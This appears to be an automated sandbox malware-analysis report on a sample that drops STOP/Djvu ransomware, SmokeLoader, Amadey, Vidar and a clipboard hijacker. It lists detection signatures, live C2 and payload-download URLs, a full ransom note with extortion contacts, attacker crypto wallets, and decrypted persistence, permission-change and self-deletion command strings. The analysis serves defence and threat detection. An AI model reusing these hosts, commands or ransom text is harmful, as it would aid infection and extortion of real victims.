23.2.AF5C.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
23.2.AF5C.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
23.2.AF5C.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
23.2.AF5C.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
29.2.E8B1.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
29.2.E8B1.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
29.2.E8B1.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.E8B1.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
33.2.6000.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
33.2.6000.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
33.2.6000.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
33.2.6000.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
22.2.9B15.exe.26615a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
22.2.9B15.exe.26615a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
22.2.9B15.exe.26615a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
22.2.9B15.exe.26615a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
41.2.759F.exe.23a15a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
41.2.759F.exe.23a15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
41.2.759F.exe.23a15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
41.2.759F.exe.23a15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
40.0.D5B9.exe.b30000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x450c9b:$s1: Runner 0x450e00:$s3: RunOnStartup 0x450caf:$a1: Antis 0x450cdc:$a2: antiVM 0x450ce3:$a3: antiSandbox 0x450cef:$a4: antiDebug 0x450cf9:$a5: antiEmulator 0x450d06:$a6: enablePersistence 0x450d18:$a7: enableFakeError 0x450e29:$a8: DetectVirtualMachine 0x450e4e:$a9: DetectSandboxie 0x450e79:$a10: DetectDebugger 0x450e88:$a11: CheckEmulator
40.2.D5B9.exe.42ddb50.2.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 197 entries

Snort Signatures

ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852387532045695 06/21/23-04:27:34.064906
SID:	2045695
Source Port:	52387
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://colisumy.com/dl/build2.exe$run	URL Reputation: Label: malware
Source: http://zexeq.com/files/1/build3.exe$run	URL Reputation: Label: malware
Source: http://zexeq.com/raud/get.php	URL Reputation: Label: malware
Source: http://colisumy.com/dl/build.exe	URL Reputation: Label: malware
Source: http://colisumy.com/dl/build2.exe	URL Reputation: Label: malware
Source: http://zexeq.com/raud/get.phpep	Avira URL Cloud: Label: malware
Source: http://45.9.74.80/wall.exe	Avira URL Cloud: Label: malware
Source: http://zexeq.com/	Avira URL Cloud: Label: malware
Source: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true	Avira URL Cloud: Label: malware
Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	Avira URL Cloud: Label: malware
Source: 5.42.65.80/8bmeVwqx/index.php	Avira URL Cloud: Label: malware
Source: http://zexeq.com/-98D0-4585-A1ED-B2838757AE1B	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen8
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\XandETC.exe	Avira: detection malicious, Label: HEUR/AGEN.1329655
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen8
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	Avira: detection malicious, Label: HEUR/AGEN.1357339
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen8
Source: C:\Users\user\AppData\Local\Temp\F86F.exe	Avira: detection malicious, Label: HEUR/AGEN.1357339

Found malware configuration

Source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 0000001C.00000002.478959888.00000000028F0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-vKvLYNOV9o\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0730JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Win
Source: 00000026.00000002.509075402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199235044780", "https://t.me/headlist"], "Botnet": "153ce668f1e21829c936c2b11fa4d869", "Version": "4.4"}
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	Malware Configuration Extractor: Amadey {"C2 url": "5.42.65.80/8bmeVwqx/index.php", "Version": "3.83"}
Source: 35.0.build3.exe.20000.0.unpack	Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["LLiNjWA9h4LxVtDigLQ79xQdGiJYC4oHis", "DBbgRYaKG993LFJKCWz73PZqveWsnwRmGc", "3NLzE3tXwoagBrgFsjNNkPZfrESydTD8JP", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "t1VQgJMcNsBHsDyu1tXmJZjDpgbm3ftmTGN", "42UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoSFUfCQN6Xm37LBZZ6qNBorFw3b6s2", "addr1qx4jwm700r2w6fneakg0r5pkg76vu7qkt6qv7zxza3qu3w9tyahu77x5a5n8nmvs78grv3a5eeupvh5qeuyv9mzpezuq60zykl", "1My2QNmVqkvN5M13xk8DWftjwC9G1F2w8Z", "MBD2C8QV7RDrNtSDRe9B2iH5r7yH4iMcxk", "ltc1qa5lae8k7tzcw5lcjfvfs3n0nhf0z3cgrsz2dym", "bnb136ns6lfw4zs5hg4n85vdthaad7hq5m4gtkgf23", "0xa6360e294DfCe4fE4Edf61b170c76770691aA111", "bc1qx8vykfse9s9llguez9cuyjmy092yeqkesl2r5v", "89SPVUAPHDLSq5pRdf8Eo6SLnKRJ8BNSYYnvPL6iJxGP4FBCBmkeV3CTSLCbk6uydxRnub4gLH6TBRycxSAQN2m1KcnhrSZ"]}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 47%

Perma Link

Multi AV Scanner detection for domain / URL

Source: toobussy.com	Virustotal: Detection: 12%	Perma Link
Source: colisumy.com	Virustotal: Detection: 23%	Perma Link
Source: astoriaresidency.com	Virustotal: Detection: 5%	Perma Link
Source: potunulit.org	Virustotal: Detection: 24%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\6000.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\6C74.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\759F.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\86ED.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\9B15.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\AF5C.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\D5B9.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\DF46.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\E8B1.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\F09E.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\F86F.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\XandETC.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build2.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\c2565b3a-3eb8-4770-81de-d15a2421db5e\build3.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\rrjthgj	ReversingLabs: Detection: 45%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 5.42.65.80
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: /8bmeVwqx/index.php
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 3.83
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 207aa4515d
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: oneetx.exe
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SCHTASKS
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: /TR "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: " /F
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Startup
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: rundll32
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: /Delete /TN "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Programs
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: %USERPROFILE%
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: \App
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: POST
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &vs=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &sd=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &os=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &bi=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &ar=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &pc=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &un=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &dm=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &av=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &lv=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &og=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Main
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: http://
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: https://
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Plugins/
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &unit=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: shell32.dll
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: kernel32.dll
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: GetNativeSystemInfo
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ProgramData\
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: AVAST Software
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Avira
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Kaspersky Lab
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ESET
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Panda Security
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Doctor Web
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 360TotalSecurity
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Bitdefender
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Norton
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Sophos
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Comodo
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: WinDefender
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 0123456789
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ------
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ?scr=1
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: .jpg
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ComputerName
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: -unicode-
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: VideoID
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: \0000
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: DefaultSettings.XResolution
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: DefaultSettings.YResolution
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ProductName
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 2019
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 2022
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 2016
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: CurrentBuild
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: echo Y\|CACLS "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: " /P "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: CACLS "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: :R" /E
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: :F" /E
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &&Exit
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: rundll32.exe
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: "taskkill /f /im "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: " && timeout 1 && del
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: && Exit"
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: " && ren
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: &&
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Powershell.exe
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: \|I
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: :Q
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: l(
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 8
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 70L
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 8
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: #AH
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 3=J
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 1my
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 2^x
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 2W8
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: i-X
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: <!}
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: L-Z
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: B
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: GW<
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: (
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: /,C
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 7
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ygQ
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: {
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: <z%
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: #`t
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: skC
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: XE=
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: >
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: daC
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ;A
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 0zT
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: viD
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: jZ,
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ;
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: s<>
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 2
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: Mz8
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: 7TJ
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: %&i
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: *gO
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: ${?
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: U
Source: 40.2.D5B9.exe.4377990.0.raw.unpack	String decryptor: %aX
